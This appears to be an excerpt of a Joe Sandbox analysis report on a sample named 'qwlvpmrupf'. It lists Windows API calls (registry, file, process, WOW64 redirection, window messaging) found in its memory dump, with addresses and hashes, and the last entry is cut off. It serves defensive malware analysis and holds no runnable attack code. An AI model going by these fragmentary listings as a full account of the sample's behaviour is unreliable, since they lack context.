                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$_wcslen$ClassName
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 2081771294-1403004172
                                                • Opcode ID: 534bc5580329733f82f250a7de319f66318e50886a4b290bc8d2f10d0b3f13c5
                                                • Instruction ID: 08247393bd66db5e2f5c22ea07a2ae8246a04bc773f0e8dcded2664e5d767e2c
                                                • Opcode Fuzzy Hash: 534bc5580329733f82f250a7de319f66318e50886a4b290bc8d2f10d0b3f13c5
                                                • Instruction Fuzzy Hash: 98210772900104BFDB26ABB4EC45DFFB779EF55750F14811AF421AB2E2DB7C490A9A10
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0037637F,?,?,003760AA,?,00000001,?,?,00000000), ref: 0037633E
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00376350
                                                • FreeLibrary.KERNEL32(00000000,?,?,0037637F,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376362
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 145871493-3689287502
                                                • Opcode ID: 1bfe7bb6337ab0528d4ca936895386ae14654cb255507c8eedc71368ec8486b5
                                                • Instruction ID: 880c55003774ef8bc5b38689e99bcf70a97a6b7ac01736007c8388b661ae810f
                                                • Opcode Fuzzy Hash: 1bfe7bb6337ab0528d4ca936895386ae14654cb255507c8eedc71368ec8486b5
                                                • Instruction Fuzzy Hash: 52E08636E01F2157E22317596C19B5AA6189F86B227064125F904F6158DF7CCC05C0B8
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,003B54C3,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376304
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00376316
                                                • FreeLibrary.KERNEL32(00000000,?,?,003B54C3,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376329
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 145871493-1355242751
                                                • Opcode ID: 9bdd3dd501e0ea7c83fbe66e524239fdce486bf56578b1ba11fea7c7a7eb4532
                                                • Instruction ID: e28b0e3e96e0d4fea7fb1003324643ed5e1f4ffa232d9e6924f1a7174c21de3a
                                                • Opcode Fuzzy Hash: 9bdd3dd501e0ea7c83fbe66e524239fdce486bf56578b1ba11fea7c7a7eb4532
                                                • Instruction Fuzzy Hash: 58D0C23AE029216BA2332764AC29A8E7E14DECAB1134A4035B805B613CCF3CCC05C1D8
                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 003FAD86
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003FAD94
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003FADC7
                                                • CloseHandle.KERNEL32(?), ref: 003FAF9C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                • String ID:
                                                • API String ID: 3488606520-0
                                                • Opcode ID: 399947c4f0ca9fff2ca066e2bfd5c31f4563ffd1727f64fe530ef5bcf4da1b1f
                                                • Instruction ID: 0bbb52b50124fa5723fcb7b69a76d4686b65c6181e8440960a9663969ebabb1c
                                                • Opcode Fuzzy Hash: 399947c4f0ca9fff2ca066e2bfd5c31f4563ffd1727f64fe530ef5bcf4da1b1f
                                                • Instruction Fuzzy Hash: B4A1BFB16047009FD721EF28C896F2AB7E5AF48714F14885DF6999F292DB74EC41CB82
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003FC00D,?,?), ref: 003FD314
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD350
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3C7
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3FD
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003FC404
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003FC45F
                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003FC4C2
                                                • RegCloseKey.ADVAPI32(?,?), ref: 003FC505
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003FC512
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                • String ID:
                                                • API String ID: 826366716-0
                                                • Opcode ID: 651f3cc7b3bf6b2d0907758a46fe884ebb4c0a455a39d8a8a75770e073edfa44
                                                • Instruction ID: 0d208b81b36ae076dc9b7536b0bcfdcb3a380a64fd337f4628b348816c9246af
                                                • Opcode Fuzzy Hash: 651f3cc7b3bf6b2d0907758a46fe884ebb4c0a455a39d8a8a75770e073edfa44
                                                • Instruction Fuzzy Hash: 6861CF31218249AFD316DF24C990E7ABBE5FF84308F14949CF5998B2A2CB35ED05CB91
                                                APIs
                                                  • Part of subcall function 003DE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003DD6E2,?), ref: 003DE629
                                                  • Part of subcall function 003DE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003DD6E2,?), ref: 003DE642
                                                  • Part of subcall function 003DE9C5: GetFileAttributesW.KERNELBASE(?,003DD755), ref: 003DE9C6
                                                • lstrcmpiW.KERNEL32(?,?), ref: 003DEC9F
                                                • MoveFileW.KERNEL32(?,?), ref: 003DECD8
                                                • _wcslen.LIBCMT ref: 003DEE17
                                                • _wcslen.LIBCMT ref: 003DEE2F
                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 003DEE7C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                • String ID:
                                                • API String ID: 3183298772-0
                                                • Opcode ID: be2d1fe5535ffc2a2522ce1585d47e6c0bb74a5b164530af46f39f60a6abce93
                                                • Instruction ID: a0b8f933c9354871ebb1ceec5514c7843cde517f4fbff5279ffe97094a0a866b
                                                • Opcode Fuzzy Hash: be2d1fe5535ffc2a2522ce1585d47e6c0bb74a5b164530af46f39f60a6abce93
                                                • Instruction Fuzzy Hash: 325184B24083855BC736EB94D881ADFB7ECAF85310F00492FF5899B152EF34A6888756
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 4d589b8f4a4a4d3928701d99e4de8e2da385b6bdd643a420e74e7106a1995690
                                                • Instruction ID: 30cfb060903c7ed5175b14d6633b48936c83eaff1edad3f115417b4e85bb2b75
                                                • Opcode Fuzzy Hash: 4d589b8f4a4a4d3928701d99e4de8e2da385b6bdd643a420e74e7106a1995690
                                                • Instruction Fuzzy Hash: 9241D136A002049FDB25DF7CC881A5EB7F6EF8A714F1641A8E915EF291D631ED01CB80
                                                APIs
                                                • GetInputState.USER32 ref: 003E4225
                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 003E427C
                                                • TranslateMessage.USER32(?), ref: 003E42A5
                                                • DispatchMessageW.USER32(?), ref: 003E42AF
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003E42C0
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                • String ID:
                                                • API String ID: 2256411358-0
                                                • Opcode ID: 63dd2979c27b90404f4ca19285aa489dc1a1059513798ccc774e5c3df522a6cf
                                                • Instruction ID: 32834389d58a4b3f4788851e5823b04d6c9ac871bc0359a221571d30e955ae2f
                                                • Opcode Fuzzy Hash: 63dd2979c27b90404f4ca19285aa489dc1a1059513798ccc774e5c3df522a6cf
                                                • Instruction Fuzzy Hash: BF31E6749002959EEB36CB76DD08BB637ACAB0D305F450B7DF962820E0E7B49984CB15
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 003D21A5
                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 003D2251
                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 003D2259
                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 003D226A
                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 003D2272
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessagePostSleep$RectWindow
                                                • String ID:
                                                • API String ID: 3382505437-0
                                                • Opcode ID: c5adea2e261892acb998c7c727f8f1ca14b62f414cc634121cd136ff963b96e4
                                                • Instruction ID: 22ebed374d03409c8130886b529f653cb87f57c3946583434d8326f744286b66
                                                • Opcode Fuzzy Hash: c5adea2e261892acb998c7c727f8f1ca14b62f414cc634121cd136ff963b96e4
                                                • Instruction Fuzzy Hash: 4731D672900219EFDB04CFA8DD89ADF7BB5EB24315F104626F925AB2D0C770AD54CB90
                                                APIs
                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 004060A4
                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 004060FC
                                                • _wcslen.LIBCMT ref: 0040610E
                                                • _wcslen.LIBCMT ref: 00406119
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00406175
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$_wcslen
                                                • String ID:
                                                • API String ID: 763830540-0
                                                • Opcode ID: dcdaf65e6f9c924131f84c1cd79ca6a87fc48ae992b49bfa8e3c7d1d778c0ec1
                                                • Instruction ID: 6b06eeb5f3120ece6c2e780ff88e4a03573e9ec4245ef0ae8b92bd33752916ad
                                                • Opcode Fuzzy Hash: dcdaf65e6f9c924131f84c1cd79ca6a87fc48ae992b49bfa8e3c7d1d778c0ec1
                                                • Instruction Fuzzy Hash: CD215071900218ABDB119FA4CC849EE7BB9EF05324F108267F926BA2C5D7788585CF55
                                                APIs
                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003D07D1,80070057,?,?,?,003D0BEE), ref: 003D08BB
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003D07D1,80070057,?,?), ref: 003D08D6
                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003D07D1,80070057,?,?), ref: 003D08E4
                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003D07D1,80070057,?), ref: 003D08F4
                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003D07D1,80070057,?,?), ref: 003D0900
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                • String ID:
                                                • API String ID: 3897988419-0
                                                • Opcode ID: 169463ac901039cdb332ddddc02d78524edf039d3ff3d8aa70022f9a51e9a6c6
                                                • Instruction ID: 38d648af53fcc882cf42a48b714a5c8dcbf8a2629038e9769f36b93222015ef1
                                                • Opcode Fuzzy Hash: 169463ac901039cdb332ddddc02d78524edf039d3ff3d8aa70022f9a51e9a6c6
                                                • Instruction Fuzzy Hash: 4F018F73A00208AFDB165FA4ED04B9A7BBDEB48B52F114025F905E2321D770DD009BA0
                                                APIs
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0BE0
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0BED
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0BFA
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0C07
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0C14
                                                • CloseHandle.KERNEL32(?,?,?,?,003E0A39,?,003E3C56,?,00000001,003B3ACE,?), ref: 003E0C21
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 22b75fd5907b3543431833ea0d9c0c54aa732b9bca9397ab2641286e9618ba46
                                                • Instruction ID: a949fa169079081481d096e2e60964eeeb3ae3ab45d86b930fc873343e063447
                                                • Opcode Fuzzy Hash: 22b75fd5907b3543431833ea0d9c0c54aa732b9bca9397ab2641286e9618ba46
                                                • Instruction Fuzzy Hash: 27019071800B669FC735AF66D980816FBF5BE503153168A3ED19252971C7B1A989CE80
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 003D64E7
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 003D64FE
                                                • MessageBeep.USER32(00000000), ref: 003D6516
                                                • KillTimer.USER32(?,0000040A), ref: 003D6532
                                                • EndDialog.USER32(?,00000001), ref: 003D654C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: 3cd8c771ad459d68f00ad3d004e03642b74f0df2dfef9adb35bf43386bb7c628
                                                • Instruction ID: 86bab805c4bc75fd5a1992348b6cb8f00cf5171a46dc77fd6d00426289efd435
                                                • Opcode Fuzzy Hash: 3cd8c771ad459d68f00ad3d004e03642b74f0df2dfef9adb35bf43386bb7c628
                                                • Instruction Fuzzy Hash: F901D631900704ABEB215F54FE4FB967779BB10701F00056AB197714E0DBF4AA98CB54
                                                APIs
                                                • _free.LIBCMT ref: 003A264E
                                                  • Part of subcall function 003A2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,003ADB71,00441DC4,00000000,00441DC4,00000000,?,003ADB98,00441DC4,00000007,00441DC4,?,003ADF95,00441DC4), ref: 003A2D6E
                                                  • Part of subcall function 003A2D58: GetLastError.KERNEL32(00441DC4,?,003ADB71,00441DC4,00000000,00441DC4,00000000,?,003ADB98,00441DC4,00000007,00441DC4,?,003ADF95,00441DC4,00441DC4), ref: 003A2D80
                                                • _free.LIBCMT ref: 003A2660
                                                • _free.LIBCMT ref: 003A2673
                                                • _free.LIBCMT ref: 003A2684
                                                • _free.LIBCMT ref: 003A2695
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 608fea7afdcf6dcd531af5ec5f27d84224bb076aa2172f805259202eb4a8a6cc
                                                • Instruction ID: 5355a2d4f2989b765d4c12b0aadd5edc2730ba19c0ea47ab3391eebed3c4ba26
                                                • Opcode Fuzzy Hash: 608fea7afdcf6dcd531af5ec5f27d84224bb076aa2172f805259202eb4a8a6cc
                                                • Instruction Fuzzy Hash: 96F03A788012208FD706BF58BC4184A3B64FB1B751742026BF524AA276C7B00997AF8C
                                                APIs
                                                  • Part of subcall function 003905D2: EnterCriticalSection.KERNEL32(0044170C,?,00000000,?,0037D1DA,00443540,00000001,00000000,?,?,003EEF39,?,?,00000000,00000001,?), ref: 003905DD
                                                  • Part of subcall function 003905D2: LeaveCriticalSection.KERNEL32(0044170C,?,0037D1DA,00443540,00000001,00000000,?,?,003EEF39,?,?,00000000,00000001,?,00000001,00442430), ref: 0039061A
                                                  • Part of subcall function 00390433: __onexit.LIBCMT ref: 00390439
                                                • __Init_thread_footer.LIBCMT ref: 003F6B95
                                                  • Part of subcall function 00390588: EnterCriticalSection.KERNEL32(0044170C,00000000,?,0037D208,00443540,003B27E9,00000001,00000000,?,?,003EEF39,?,?,00000000,00000001,?), ref: 00390592
                                                  • Part of subcall function 00390588: LeaveCriticalSection.KERNEL32(0044170C,?,0037D208,00443540,003B27E9,00000001,00000000,?,?,003EEF39,?,?,00000000,00000001,?,00000001), ref: 003905C5
                                                  • Part of subcall function 003E3EF6: LoadStringW.USER32(00000066,?,00000FFF,0040DCEC), ref: 003E3F3E
                                                  • Part of subcall function 003E3EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 003E3F64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                • String ID: x3D$x3D$x3D
                                                • API String ID: 1072379062-1385361720
                                                • Opcode ID: fc015dccb922bfffa7660a1dbf835f7a26d8a5fca4e564df29986be8efd94a0c
                                                • Instruction ID: 7ca58361cf905b62ba0c13b6ac566eb7bc2ecd074c0400ef678cefb747b356a7
                                                • Opcode Fuzzy Hash: fc015dccb922bfffa7660a1dbf835f7a26d8a5fca4e564df29986be8efd94a0c
                                                • Instruction Fuzzy Hash: 7FC1C135A00109AFDB16DF58C882EBEB7B9FF58300F118069FA55AB291DB74ED44CB90
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0037D203
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: D5D$D5D$D5D
                                                • API String ID: 1385522511-3209547757
                                                • Opcode ID: 538816186b24277a88ddff8387ac69cc37d9ea3d1455bb7c64a319e730cdaa5f
                                                • Instruction ID: 7ab492a5ab88ad6ba979f04251c8cba7a22fe712c822ef3b9710c77e6db85db0
